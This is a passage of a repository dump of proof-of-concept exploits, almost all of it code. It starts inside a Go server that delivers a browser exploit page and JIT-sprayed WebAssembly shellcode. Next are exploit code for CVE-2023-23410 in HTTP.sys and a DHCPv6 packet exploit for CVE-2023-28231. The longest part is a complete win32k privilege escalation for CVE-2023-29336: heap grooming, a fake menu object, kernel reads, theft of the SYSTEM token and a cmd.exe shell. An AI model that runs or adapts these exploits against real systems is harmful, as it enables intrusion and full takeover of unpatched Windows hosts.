  (call $f (i64.const 0x0BEBCA0148CB0149)) ;; 49 01 CB 48 01 CA EB 0B    0BEBCA0148CB0149
  (call $f (i64.const 0x0BEBc98b4dD28545)) ;; 45 85 D2 4d 8b c9 EB 0B    0BEBc98b4dD28545
  (call $f (i64.const 0x0BEB00000092840F)) ;; 0F 84 92 00 00 00 EB 0B    0BEB00000092840F
  (call $f (i64.const 0x0BEB90506C6175BB)) ;; BB 75 61 6C 50 90 EB 0B    0BEB90506C6175BB
  (call $f (i64.const 0x0BEB909020E3C148)) ;; 48 C1 E3 20 90 90 EB 0B    0BEB909020E3C148
  (call $f (i64.const 0x0BEB9074726956BE)) ;; BE 56 69 72 74 90 EB 0B    0BEB9074726956BE
  (call $f (i64.const 0x0BEB088B41F30148)) ;; 48 01 F3 41 8B 08 EB 0B    0BEB088B41F30148
  (call $f (i64.const 0x0BEB4674091C394A)) ;; 4A 39 1C 09 74 46 EB 0B    0BEB4674091C394A
  (call $f (i64.const 0x0BEB04C08349C0FF)) ;; FF C0 49 83 C0 04 EB 0B    0BEB04C08349C0FF
  (call $f (i64.const 0x0BEB90C572D03944)) ;; 44 39 D0 72 C5 90 EB 0B    0BEB90C572D03944
  (call $f (i64.const 0x0BEBd28b4dC3C031)) ;; 31 C0 C3 4d 8b d2 EB 0B    0BEBd28b4dC3C031
  (call $f (i64.const 0x0BEB904304B70F41)) ;; 41 0F B7 04 43 90 EB 0B    0BEB904304B70F41
  (call $f (i64.const 0x0BEB9008245C8B48)) ;; 48 8B 5C 24 08 90 EB 0B    0BEB9008245C8B48
  (call $f (i64.const 0x0BEBC8014C82048B)) ;; 8B 04 82 4C 01 C8 EB 0B    0BEBC8014C82048B

  (call $f (i64.const 0x0BEB909090C68948)) ;; 48 89 C6 90 90 90 EB 0B    0BEB909090C68948
  (call $f (i64.const 0x0BEB9000002000BA)) ;; BA 00 20 00 00 90 EB 0B    0BEB9000002000BA
  (call $f (i64.const 0x0BEB00000040B841)) ;; 41 B8 40 00 00 00 EB 0B    0BEB00000040B841
  (call $f (i64.const 0x0BEB90AABBCCDDB8)) ;; B8 DD CC BB AA 90 EB 0B    0BEB90AABBCCDDB8
  (call $f (i64.const 0x0BEB909050F0014C)) ;; 4C 01 F0 50 50 90 EB 0B    0BEB909050F0014C
  (call $f (i64.const 0x0BEB909090C18948)) ;; 48 89 C1 90 90 90 EB 0B    0BEB909090C18948
  (call $f (i64.const 0x0BEB000019000548)) ;; 48 05 00 19 00 00 EB 0B    0BEB000019000548
  (call $f (i64.const 0x0BEB90E6FFC18949)) ;; 49 89 C1 FF E6 90 EB 0B    0BEB90E6FFC18949
)) 
`

func faviconHandler(w http.ResponseWriter, r *http.Request) {
	http.ServeFile(w, r, "favicon.ico")
}

func check(e error) {
	if e != nil {
		panic(e)
	}
}
func isValidAddress(str string) bool {
	match, _ := regexp.MatchString("^[0-9a-fA-F]{1,8}$", str)
	return match
}

func processShellcodeAddr(str string, code string) (string, error) {
	if !isValidAddress(str) {
		fmt.Println("ShellcodeAddr地址无效")
		return "", errors.New("ShellcodeAddr地址无效")
	}
	code = strings.Replace(code, "0x0BEB90AABBCCDDB8", "0x0BEB90"+str+"B8", 1)
	return code, nil
}
func fileServerHandler(w http.ResponseWriter, r *http.Request) {
	fmt.Println(r.URL.Path)
	p := "." + r.URL.Path
	extName := path.Ext(r.URL.Path)
	// 获取路径的最后一部分
	base := path.Base(r.URL.Path)
	// 检查它是否全部由0-9或a-f组成
	match, _ := regexp.MatchString("^[0-9a-f]+$", base)
	if match {
		fmt.Println("Matched string:", base)
		// 解析十六进制字符串为整数
		i, err := strconv.ParseInt(base, 16, 64)
		if err != nil {
			log.Println("Error parsing hex string:", err)
			http.ServeFile(w, r, p)
			return
		}
		// 获得i的高4个字节并减去0x10
		high4Bytes := int64(uint64(i)>>32) - 0x10

		// 确保减法操作不会使值变为负数
		if high4Bytes < 0 {
			high4Bytes = 0
		}

		// 用新值替换i的高4个字节
		i = (high4Bytes << 32) | (i & 0xFFFFFFFF)
		// 解析整数为浮点数
		globalFloat = math.Float64frombits(uint64(i))
		// 打印浮点数
		fmt.Println("Float: ", globalFloat)
		// Send an empty response
		w.WriteHeader(http.StatusOK)
		return
	}
	if base == "exp.html" {
		if globalFloat == -1 {
			fmt.Fprint(w, `
			<!DOCTYPE html>
			<html>
			<head>
				<title>Refresh Page</title>
			</head>
			<body>
				<script>setTimeout(function(){ location.reload(); }, 1000);</script>
				<p>Loading...</p>
			</body>
			</html>
			`)
			return
		}
		content, err := ioutil.ReadFile(p)
		if err != nil {
			http.Error(w, err.Error(), http.StatusInternalServerError)
			return
		}
		newContent := strings.Replace(string(content), "xxx", fmt.Sprint(globalFloat), -1)
		fmt.Println("New content: ", newContent)
		fmt.Fprint(w, newContent)
		globalFloat = -1
		return
	}
	// fmt.Println(extName)
	if extName == ".wasm" {
		// 去掉扩展名
		nameWithoutExt := strings.TrimSuffix(r.URL.Path, filepath.Ext(r.URL.Path))
		// 去掉前面的"/"
		baseName := filepath.Base(nameWithoutExt)
		fmt.Printf(baseName)
		wasmCodeOk, err := processShellcodeAddr(baseName, wasm_code)
		if err != nil {
			fmt.Println("发生错误：", err)
			panic("处理ShellcodeAddr发生错误")
		}
		fmt.Println(wasmCodeOk)
		wasm, err := wasmtime.Wat2Wasm(wasmCodeOk)
		if err != nil {
			fmt.Printf("error converting wat to wasm: %v\n", err)
			os.Exit(1)
		}
		fmt.Printf("编译结束")

		w.Header().Set("Content-Type", "application/wasm")
		_, err = w.Write([]byte(wasm))
		check(err)
		w.(http.Flusher).Flush()
		fmt.Printf("flushOK")
		return
	}
	http.ServeFile(w, r, p)
}
func main() {
	port := flag.String("p", "443", "port to serve on")
	directory := flag.String("d", ".", "the directory of static file to host")
	flag.Parse()
	fmt.Printf("path %s\n", *directory)
	http.HandleFunc("/favicon.ico", faviconHandler)
	http.HandleFunc("/", fileServerHandler)
	log.Printf("Begin Serving %s on HTTP port: %s\n", *directory, *port)
	log.Fatal(http.ListenAndServeTLS(":443", "server.pem", "key.pem", nil))
}


================================================
FILE: CVE-2023-23410/CVE-2023-23410_poc.c
================================================
#define SECURITY_WIN32
#include <http.h>
#include <sspi.h>
#include <strsafe.h>
#pragma warning(disable:4127)   // condition expression is constant

int
__cdecl
wmain(
    int argc,
    __in_ecount(argc) wchar_t* argv[]
)
{
    
    int i;
    HANDLE          hReqQueue = NULL;
    HTTPAPI_VERSION HttpApiVersion = HTTPAPI_VERSION_2;
    HTTP_SERVER_SESSION_ID ssID = HTTP_NULL_ID;
   
    HTTP_BINDING_INFO BindingProperty;
    HTTP_TIMEOUT_LIMIT_INFO CGTimeout;
    ULONG           retCode;
    HTTP_URL_GROUP_ID urlGroupId = HTTP_NULL_ID;


    //
    // Initialize HTTP APIs.
    //

    retCode = HttpInitialize(
        HttpApiVersion,
        HTTP_INITIALIZE_SERVER,    // Flags
        NULL                       // Reserved
    );

    if (retCode != NO_ERROR)
    {
        wprintf(L"HttpInitialize failed with %lu \n", retCode);
        return retCode;
    }

    //
    // Create a server session handle
    //

    retCode = HttpCreateServerSession(HttpApiVersion,
        &ssID,
        0);


    if (retCode != NO_ERROR)
    {
        wprintf(L"HttpCreateServerSession failed with %lu \n", retCode);
        return;
    }
    //
    // Create UrlGroup handle
    //

    retCode = HttpCreateUrlGroup(ssID,
        &urlGroupId,
        0);


    if (retCode != NO_ERROR)
    {
        wprintf(L"HttpCreateUrlGroup failed with %lu \n", retCode);
        return;
    }

    ULONGLONG data1[4] = { 0 };
    ULONGLONG data3[0x21] = { 0 };
    ULONGLONG data[0x1000] = { 0 };
    BYTE data_temp1[0x1000] = { 0 };
    DWORD return_len = 0;

    WCHAR* str = HeapAlloc(GetProcessHeap(), 0, 0xfffffe0);
    WCHAR str_test[0xfffe] = L"192.168.205.155:8081";
    memcpy(str, str_test, 0x20);
    
    data1[0] = 0x01;
    data1[1] = str;
    data1[2] = 0xfffffe0-0xf0f0f0;
    
    for (int i = 0; i < 0x11; i++)
    {
        data3[i] = data1;
    }
    data[5] = 0x20;
    data[3] = 0x0c;
    data[2] = 0x11;
    data[0] = 0x1;
    data[1] = data3;

    retCode = HttpSetUrlGroupProperty(urlGroupId, HttpServerChannelBindProperty,&data,0x20);

    retCode = HttpQueryUrlGroupProperty(urlGroupId,HttpServerChannelBindProperty,&data_temp1,0x140, &return_len);


}



================================================
FILE: CVE-2023-28231/CVE-2023-28231-DHCP-VUL-PoC.cpp
================================================

#include <winsock2.h>
#include <ws2tcpip.h>
#include <iostream>

#pragma comment(lib, "Ws2_32.lib")

int main() {
    char data[] =
        "\x0c\x03\xa4\xf2\x00\x08\x00\x02\x00\x00\x00\x01\x00\x0e\x00\x01"
        "\x00\x01\x2b\x07\x5b\xc1\x00\x0c\x29\xe8\x6b\x79\x00\x03\x00\x0c"
        "\x07\x00"




        "\x00\x09\x00\x86\x0c\x02"//0x3a+0x26*2

        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

        "\x00\x09\x00\x60\x0c\x02"//0x3a+0x26

        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

        "\x00\x09\x00\x3a\x0c\x01"

        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

        "\x00\x09\x00\x14\x01\x07\x00\x00"
        "\x00\x02\x00\x04\x01\x07\x00\x00"
        "\x00\x01\x00\x04\x01\x07\x00\x00"

        ;

    char par1[] =
        "\x00\x09\x0a\x9b\x0c\x01"
        "\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
    char par2[] =
        "\x00\x09\x00\x14\x01\x07\x00\x00"
        "\x00\x02\x00\x04\x01\x07\x00\x00"
        "\x00\x01\x00\x04\x01\x07\x00\x00"
        ;



    char data1[0x1000] =
        "\x0c\x20\xa4\xf2\x00\x08\x00\x02\x00\x00\x00\x01\x00\x0e\x00\x01"
        "\x00\x01\x2b\x07\x5b\xc1\x00\x0c\x29\xe8\x6b\x79\x00\x03\x00\x0c"
        "\x07\x00"

        ;

    int num = 0x1f;
    int total_len = 0x14 + 0x26 * (num+1);
    for (int i = 0; i <= num; i++)
    {
        memset(par1 + 5, num - i, 1);
        short temp = htons(total_len - i * 0x26);

        memcpy(par1 + 2, &temp, 2);
        memcpy(data1 + 0x22 + 0x26 * i, par1, 0x26);
        if (i == num)
        {
            memcpy(data1 + 0x22 + 0x26 * i + 0x26, par2, 0x18);
        }

    }
    int sendlenth = 0x26 * (num+1) + 0x22 + 0x18;
    // 初始化 Winsock
    WSADATA wsaData;
    int result = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (result != 0) {
        std::cerr << "WSAStartup failed with error: " << result << std::endl;
        return 1;
    }

    // 创建套接字
    SOCKET sock = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
    if (sock == INVALID_SOCKET) {
        std::cerr << "Failed to create socket: " << WSAGetLastError() << std::endl;
        WSACleanup();
        return 1;
    }

    // 设置套接字选项，允许发送广播
    int optVal = 1;
    if (setsockopt(sock, IPPROTO_IPV6, IPV6_MULTICAST_LOOP, (char*)&optVal, sizeof(optVal)) == SOCKET_ERROR) {
        std::cerr << "Failed to set socket option: " << WSAGetLastError() << std::endl;
        closesocket(sock);
        WSACleanup();
        return 1;
    }

    // 构建 DHCPv6 广播地址
    sockaddr_in6 destAddr = { 0 };
    destAddr.sin6_family = AF_INET6;
    destAddr.sin6_port = htons(547); // DHCPv6 默认端口号为 547
    InetPton(AF_INET6, L"ff02::1:2", &destAddr.sin6_addr); // DHCPv6 广播地址为 ff02::1:2

    // 发送 DHCPv6 广播消息
    int sendResult = 0;
    for (int i = 0; i < 0x10; i++)
    {
        sendResult = sendto(sock, data1, sendlenth, 0, (sockaddr*)&destAddr, sizeof(destAddr));
    }

    int m = GetLastError();
    if (sendResult == SOCKET_ERROR) {
        std::cerr << "Failed to send data: " << WSAGetLastError() << std::endl;
        closesocket(sock);
        WSACleanup();
        return 1;
    }

    std::cout << "DHCPv6 Broadcast message sent!" << std::endl;

    // 清理资源
    closesocket(sock);
    WSACleanup();

    return 0;
}


================================================
FILE: CVE-2023-29336/poc.cpp
================================================

// writeup link:  https://www.numencyber.com/cve-2023-29336-win32k-analysis/

#include <windows.h>
//windows server 2016 Datacenter update patch in May
#include <stdio.h>
#include <tchar.h>

#define IDM_MYMENU 101
#define IDM_EXIT 102
#define IDM_DISABLE 0xf120
#define IDM_ENABLE 104
#define EPROCESS_UNIQUE_PROCESS_ID_OFFSET 0x440
#define EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448
#define EPROCESS_TOKEN_OFFSET 0x4b8

typedef DWORD64(NTAPI* NtUserEnableMenuItem)(HMENU hMenu, UINT uIDEnableItem, UINT uEnable);

typedef DWORD64(NTAPI* NtUserSetClassLongPtr)(HWND a1, unsigned int a2, unsigned __int64 a3, unsigned int a4);
typedef DWORD64(NTAPI* NtUserCreateAcceleratorTable)(void* Src, int a2);
typedef DWORD64(NTAPI* fnNtUserConsoleControl)(int nConsoleCommand, PVOID, int nConsoleInformationLength);


NtUserSetClassLongPtr g_NtUserSetClassLongPtr = NULL;
NtUserEnableMenuItem g_NtUserEnableMenuItem = NULL;
NtUserCreateAcceleratorTable g_NtUserCreateAcceleratorTable = NULL;
fnNtUserConsoleControl g_pfnNtUserConsoleControl = nullptr;
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam);
int syytem();
typedef struct _SHELLCODE {
    DWORD reserved;
    DWORD pid;
    DWORD off_THREADINFO_ppi;
    DWORD off_EPROCESS_ActiveLink;
    DWORD off_EPROCESS_Token;
    BOOL  bExploited;
    BYTE  pfnWindProc[];
} SHELLCODE, * PSHELLCODE;
struct tagMENU
{
    ULONG64 field_0;
    ULONG64 field_8;
    ULONG64 field_10;
    ULONG64 field_18;
    ULONG64 field_20;
    PVOID obj28;
    DWORD field_30;
    DWORD flag1;
    DWORD flag2;
    DWORD cxMenu;
    DWORD cyMenu;
    ULONG64 field_48;
    PVOID rgItems;
    ULONG64 field_58; // + 0x58
    ULONG64 field_60;
    ULONG64 field_68;
    ULONG64 field_70;
    ULONG64 field_78;
    ULONG64 field_80;
    ULONG64 field_88;
    ULONG64 field_90;
    PVOID ref; // + 0x98
};
struct MyData
{
    BYTE name[0x96];
};
tagMENU* g_pFakeMenu = 0;
static PSHELLCODE pvShellCode = NULL;
HMENU hSystemMenu;
HMENU hMenu;
HMENU hSubMenu;
HMENU hAddedSubMenu;
HMENU hMenuB;
PVOID MENU_add = 0;
DWORD flag = 0;
UINT iWindowCount = 0x100;
HWND HWND_list[0x300];
HWND HWND_list1[0x20];
HMENU HMENUL_list[0x300];
int Hwnd_num = 0;
int Hwnd_num1 = 0;
ULONGLONG HWND_add = 0;
ULONGLONG GS_off = 0;
WORD max = 0;

static PULONGLONG     ptagWNDFake = NULL;
static PULONGLONG     ptagWNDFake1 = NULL;
static PULONGLONG     ptagWNDFake2 = NULL;

static PULONGLONG     GS_hanlde = NULL;

static PULONGLONG     HWND_class = NULL;


struct ThreadParams {
    int threadId;
    int numLoops;
};


static unsigned long long GetGsValue(unsigned long long gsValue)
{
    return gsValue;
}
PVOID
GetMenuHandle(HMENU menu_D)
{
    int conut = 0;
    PVOID HANDLE = 0;
    PBYTE add = 0;
    WORD temp = 0;
    DWORD offset = 0xbd688;
    HMODULE hModule = LoadLibraryA("USER32.DLL");

    PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu");
    ULONGLONG par1 = 0;
    DWORD par2 = 0;
    memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08);
    memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02);

    add = (PBYTE)(par1 + 0x18 * (WORD)menu_D);

    if (add)
    {
        HANDLE = *(PVOID*)add;
    }
    else
    {
        HANDLE = 0;
    }
    HANDLE= (PVOID*)((ULONGLONG)HANDLE - GS_off+0x20);
    return *(PVOID*)HANDLE;

}

PVOID
xxGetHMValidateHandle(HMENU menu_D, DWORD type_hanlde)
{
    int conut = 0;
    PVOID HANDLE = 0;
    PBYTE add = 0;
    WORD temp = 0;
    DWORD offset = 0xbd688;
    HMODULE hModule = LoadLibraryA("USER32.DLL");

    PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu");
    ULONGLONG par1 = 0;
    DWORD par2 = 0;
    memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08);
    memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02);

    temp = (ULONGLONG)menu_D >> 16;
    add = (PBYTE)(par1 + 0x18 * (WORD)menu_D);
    if (add)
    {
        HANDLE = *(PVOID*)add;
    }
    else
    {
        HANDLE = 0;
    }
    HANDLE = (PVOID*)((ULONGLONG)HANDLE - GS_off + 0x20);
    return *(PVOID*)HANDLE;

}


static
VOID
xxReallocPopupMenu(VOID)
{
    for (INT i = 0; i < 0x8; i++)
    {
        WNDCLASSEXW Class = { 0 };
        WCHAR       szTemp[0x100] = { 0 };
        HWND        hwnd = NULL;
        wsprintfW(szTemp, L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@A%d", i);
        Class.cbSize = sizeof(WNDCLASSEXA);
        Class.lpfnWndProc = DefWindowProcW;
        Class.cbWndExtra = 0;
        Class.hInstance = GetModuleHandleA(NULL);
        Class.lpszMenuName = NULL;
        Class.lpszClassName = szTemp;
        if (!RegisterClassExW(&Class))
        {
            continue;
        }
    }

}
VOID
createclass(VOID)
{
    WCHAR   szTemp[0x100] = { 0 };
    for (INT i = 9; i < 29; i++)
    {
        WNDCLASSEXW Class = { 0 };
        
        HWND        hwnd = NULL;
        wsprintfW(szTemp, L"A@A%d", i);
        Class.cbSize = sizeof(WNDCLASSEXA);
        Class.lpfnWndProc = DefWindowProcW;
        Class.cbWndExtra = 0x20;
        Class.hInstance = GetModuleHandleA(NULL);
        Class.lpszMenuName = NULL;
        Class.lpszClassName = szTemp;
        Class.cbClsExtra = 0x1a0;
        if (!RegisterClassExW(&Class))
        {
            continue;
        }
    }

    for (INT i = 9; i < 29; i++)
    {
        wsprintfW(szTemp, L"A@A%d", i);
        HWND_list1[i]=CreateWindowEx(NULL, szTemp, NULL, WS_VISIBLE, 0, 0, 0, 0, NULL,NULL, NULL, NULL);
        
        
    }
    
}

ULONG64 Read64(ULONG64 address)
{
    MENUBARINFO mbi = { 0 };
    mbi.cbSize = sizeof(MENUBARINFO);

    g_pFakeMenu->rgItems = PVOID(address - 0x48);
    GetMenuBarInfo(HWND_list[max+1], OBJID_MENU, 1, &mbi);

    return (unsigned int)mbi.rcBar.left + ((ULONGLONG)mbi.rcBar.top << 32);
}
void exploit()
{
    for (int i = 0; i < 0x20; i++)
    {
        
        ULONG64 pmenu = SetClassLongPtr(HWND_list1[i], 0x270, (LONG_PTR)g_pFakeMenu);
        if (pmenu != 0)
        {
            Hwnd_num = i;
            MENUBARINFO mbi = { 0 };
            mbi.cbSize = sizeof(MENUBARINFO);



        }
    }


    // Token stealing
    ULONG64 p = Read64(HWND_add +0x250+ 0x10); // USER_THREADINFO 
    p = Read64(p);            //THREADINFO
    p = Read64(p + 0x220);         // (PROCESSINFO)         

    ULONG64 eprocess = p;
    printf("Current EPROCESS = %llx\n", eprocess);
    p = Read64(p + 0x2f0);

    do {

        p = Read64(p + 0x08);
        ULONG64 pid = Read64(p - 0x08);
        if (pid == 4) {

            ULONG64 pSystemToken = Read64(p + 0x68);
            printf("pSys/tem Token = %llx \n", pSystemToken);

            HWND_class = (PULONGLONG)((PBYTE)0x303000);
            HWND_class[8] = eprocess + 0x290;
            HWND_class[12] = 0x100;
            HWND_class[20] = 0x303010;

            ULONG64 ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - 0xa0, (LONG_PTR)HWND_class);
            SetClassLongPtr(HWND_list[max + 1], 0x28, pSystemToken);
            ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - 0xa0, (LONG_PTR)ret_add);

            break;
        }
    } while (p != eprocess);
    syytem();
}


void buildmem()
{
    
    WORD max_handle = 0;
    pvShellCode = (PSHELLCODE)VirtualAlloc((PVOID)0x300000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (pvShellCode == NULL)
    {
        return;
    }
    ZeroMemory(pvShellCode, 0x10000);



    ptagWNDFake = (PULONGLONG)((PBYTE)0x304140);
    ptagWNDFake[0] = (ULONGLONG)0x304140;

    ptagWNDFake[2] = (ULONGLONG)0x304140 + 0x10;



    ptagWNDFake[6] = (ULONGLONG)0x304140;
    ptagWNDFake[8] = 0x305300;

    ptagWNDFake[11] = (ULONGLONG)MENU_add;
    ptagWNDFake[68] = (ULONGLONG)0x304140 + 0x230;
    ptagWNDFake[69] = (ULONGLONG)0x304140 + 0x28;
    ptagWNDFake[70] = (ULONGLONG)0x304140 + 0x30;
    ptagWNDFake[71] = (ULONGLONG)0x000004;


    ptagWNDFake1 = (PULONGLONG)((PBYTE)0x305300);
    ptagWNDFake1[1] = (ULONGLONG)0x11;
    ptagWNDFake1[2] = (ULONGLONG)0x305320;
    ptagWNDFake1[6] = (ULONGLONG)0x1000000000020000;
    ptagWNDFake1[8] = (ULONGLONG)0x00000000029d0000;
    ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120;


    ptagWNDFake1[14] = (ULONGLONG)0x306500;
    ptagWNDFake1[16] = (ULONGLONG)305400;


    ptagWNDFake2 = (PULONGLONG)((PBYTE)0x306500);
    ptagWNDFake1[11] = (ULONGLONG)0x306600;



    WNDCLASSEX WndClass = { 0 };
    WndClass.cbSize = sizeof(WNDCLASSEX);
    WndClass.lpfnWndProc = DefWindowProc;
    WndClass.style = CS_VREDRAW | CS_HREDRAW;
    WndClass.cbWndExtra = 0xe0;
    WndClass.hInstance = NULL;
    WndClass.lpszMenuName = NULL;
    WndClass.lpszClassName = L"NormalClass";
    
    RegisterClassEx(&WndClass);

    for (int i = 0; i < 0x200; i++)
    {
        HMENUL_list[i] = CreateMenu();
    }
    for (int i = 0; i < 0x100; i++)
    {
        HWND_list[i] = CreateWindowEx(NULL, L"NormalClass", NULL, WS_VISIBLE, 0, 0, 0, 0, NULL, HMENUL_list[i], NULL, NULL);

    }
    for (int i = 0; i < 0x100; i++)
    {
       

        SetWindowLongPtr(HWND_list[i], 0x58, (LONG_PTR)0x0002080000000000);

        SetWindowLongPtr(HWND_list[i], 0x80, (LONG_PTR)0x0000303030000000);

    }
    

    for (int i = 0x20; i < 0x60; i++)
    {
        if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01)- (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 - 1], 0x01)== 0x250)
        {
            if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 + 1], 0x01)-(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01) == 0x250)
            {
                HWND_add = (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i*2], 0x01);
                max = i * 2;
                break;
            }
        }
        if (i == 0x5f)
        {
            HWND_add = 0;
        }

    }
    
    ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120;


    DestroyWindow(HWND_list[max]);
    
    createclass();


    
    // Create a fake spmenu
    PVOID hHeap = (PVOID)0x302000;

    g_pFakeMenu = (tagMENU*)(PVOID)0x302000;
    g_pFakeMenu->ref = (PVOID)0x302300;
    *(PULONG64)g_pFakeMenu->ref = (ULONG64)g_pFakeMenu;
    // cItems = 1
    g_pFakeMenu->obj28 = (PVOID)0x302200;
    *(PULONG64)((PBYTE)g_pFakeMenu->obj28 + 0x2C) = 1;
    // rgItems
    g_pFakeMenu->rgItems = (PVOID)0x304000;
    // cx / cy must > 0
    g_pFakeMenu->flag1 = 1;
    g_pFakeMenu->flag2 = 1;
    g_pFakeMenu->cxMenu = 1;
    g_pFakeMenu->cyMenu = 1;


    //
    
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    ULONGLONG gsValue = 0;
    unsigned char shellcode[] = "\x65\x48\x8B\x04\x25\x30\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc3";

    LPVOID executableMemory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (executableMemory == NULL) {
        return 1;
    }
    memcpy(executableMemory, shellcode, sizeof(shellcode));
    
    gsValue = ((ULONGLONG(*)())executableMemory)();
    gsValue = gsValue + 0x800;
    GS_hanlde = (PULONGLONG)(PBYTE)gsValue;
    GS_off = GS_hanlde[5];

    char str[0xb8] = "";
    memset(str, 0x41, 0xa8);
    g_NtUserEnableMenuItem = (NtUserEnableMenuItem)GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserEnableMenuItem");
    g_NtUserSetClassLongPtr = (NtUserSetClassLongPtr)GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserSetClassLongPtr");
    g_NtUserCreateAcceleratorTable = (NtUserCreateAcceleratorTable)GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserCreateAcceleratorTable");
    g_pfnNtUserConsoleControl = (fnNtUserConsoleControl)GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserConsoleControl");

    WNDCLASS wc = { 0 };

    wc.lpfnWndProc = WndProc;
    wc.hInstance = hInstance;
    wc.lpszClassName = TEXT("EnableMenuItem");

    RegisterClass(&wc);

    HWND hWnd = CreateWindow(
        wc.lpszClassName,
        TEXT("EnableMenuItem"),
        WS_OVERLAPPEDWINDOW,
        CW_USEDEFAULT,
        CW_USEDEFAULT,
        400, 300,
        NULL,
        NULL,
        hInstance,
        NULL
    );

    if (!hWnd) return FALSE;

    ///


    hSystemMenu = GetSystemMenu(hWnd, FALSE);

    hSubMenu = CreatePopupMenu(); 
    MENU_add = GetMenuHandle(hSubMenu);
    hMenuB = CreateMenu();

    buildmem();
    if (HWND_add == 0)
    {
        return 0;
    }


    AppendMenu(hSubMenu, MF_STRING, 0x2061, TEXT("0"));
    AppendMenu(hSubMenu, MF_STRING, 0xf060, TEXT("1"));

    DeleteMenu(hSystemMenu, SC_CLOSE, MF_BYCOMMAND);

    AppendMenu(hMenuB, MF_POPUP, (UINT_PTR)hSubMenu, L"Menu A");

    AppendMenu(hSystemMenu, MF_POPUP, (UINT_PTR)hMenuB, L"Menu B");


    
    ShowWindow(hWnd, nCmdShow);
    UpdateWindow(hWnd);

    flag = 1;
    g_NtUserEnableMenuItem(hSystemMenu, 0xf060, 0x01);

    exploit();

    MSG msg = { 0 };

    while (GetMessage(&msg, NULL, 0, 0))
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }

    return (int)msg.wParam;
}

LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    switch (message)
    {
    case WM_DESTROY:
        PostQuitMessage(0);
        return 0;
    case 0xae:
        switch (wParam)
        {
        case 0x1000:
            if (flag)
            {
                int itemCount = GetMenuItemCount(hMenuB);  

                for (int i = itemCount - 1; i >= 0; i--) {
                    RemoveMenu(hMenuB, i, MF_BYPOSITION);
                }
                DestroyMenu(hSubMenu);
                xxReallocPopupMenu();
            }
        case 0x1001:
            if (flag)
            {
                int itemCount = GetMenuItemCount(hMenuB);  

                for (int i = itemCount - 1; i >= 0; i--) {
                    RemoveMenu(hMenuB, i, MF_BYPOSITION);
                }
                DestroyMenu(hSubMenu);
                xxReallocPopupMenu();
            }

            return 0;
        }
        break;


    }

    return DefWindowProc(hWnd, message, wParam, lParam);
}
int syytem()
{
    SECURITY_ATTRIBUTES     sa;
    HANDLE                  hRead, hWrite;
    byte                    buf[40960] = { 0 };
    STARTUPINFOW            si;
    PROCESS_INFORMATION     pi;
    DWORD                   bytesRead;
    RtlSecureZeroMemory(&si, sizeof(si));
    RtlSecureZeroMemory(&pi, sizeof(pi));
    RtlSecureZeroMemory(&sa, sizeof(sa));
    int br = 0;
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle = TRUE;
    if (!CreatePipe(&hRead, &hWrite, &sa, 0))
    {
        return -3;
    }

    si.cb = sizeof(STARTUPINFO);
    GetStartupInfoW(&si);
    si.hStdError = hWrite;
    si.hStdOutput = hWrite;
    si.wShowWindow = SW_HIDE;
    si.lpDesktop = L"WinSta0\\Default";
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    wchar_t cmd[4096] = { L"cmd.exe" };

    if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
    {
        CloseHandle(hWrite);
        CloseHandle(hRead);
        printf("[!] CreateProcessW Failed![%lx]\n", GetLastError());
        return -2;
    }
    CloseHandle(hWrite);

}


================================================
FILE: CVE-2023-41047/CVE-2023-41047.go
================================================
